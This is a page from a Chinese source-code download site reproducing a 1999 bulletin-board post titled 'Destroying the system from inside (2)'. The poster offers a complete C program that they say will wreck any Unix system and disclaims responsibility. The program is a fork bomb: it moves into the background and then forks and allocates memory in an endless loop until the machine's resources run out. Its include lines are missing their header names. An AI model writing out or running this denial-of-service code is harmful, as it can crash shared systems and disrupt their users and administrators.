当今
源代码在线查看: 从内部破坏系统(2).txt
软件大小: |
181 K |
上传用户: |
a6810121 |
|
|
关键词: |
|
下载地址: |
免注册下载 普通下载
|
|
发信人: lgwu (乱世糊涂虫), 信区: Security
标 题: 从内部破坏系统(2)
发信站: 武汉白云黄鹤站 (Sat Feb 27 17:31:14 1999) , 站内信件
先申明,这次我贴的是完整的程序,而且在任何unix平台上都可以运行并摧毁该系统
对产生的后果,本人概不负责.
**********cut**********
#include
#include
#include
main()
{
switch (fork())
{
case 0:
setpgrp();
break;
case -1:
fprintf(stderr,"error: fork() failed\n");
exit(1);
default:
printf("Allocating all resources in background...\n");
_exit(0);
}
for(;;)
{
if (!fork())
setpgrp();
malloc((size_t)1);
malloc((size_t)10);
malloc((size_t)100);
malloc((size_t)1000);
malloc((size_t)10000);
malloc((size_t)100000);
malloc((size_t)1000000);
}
}
--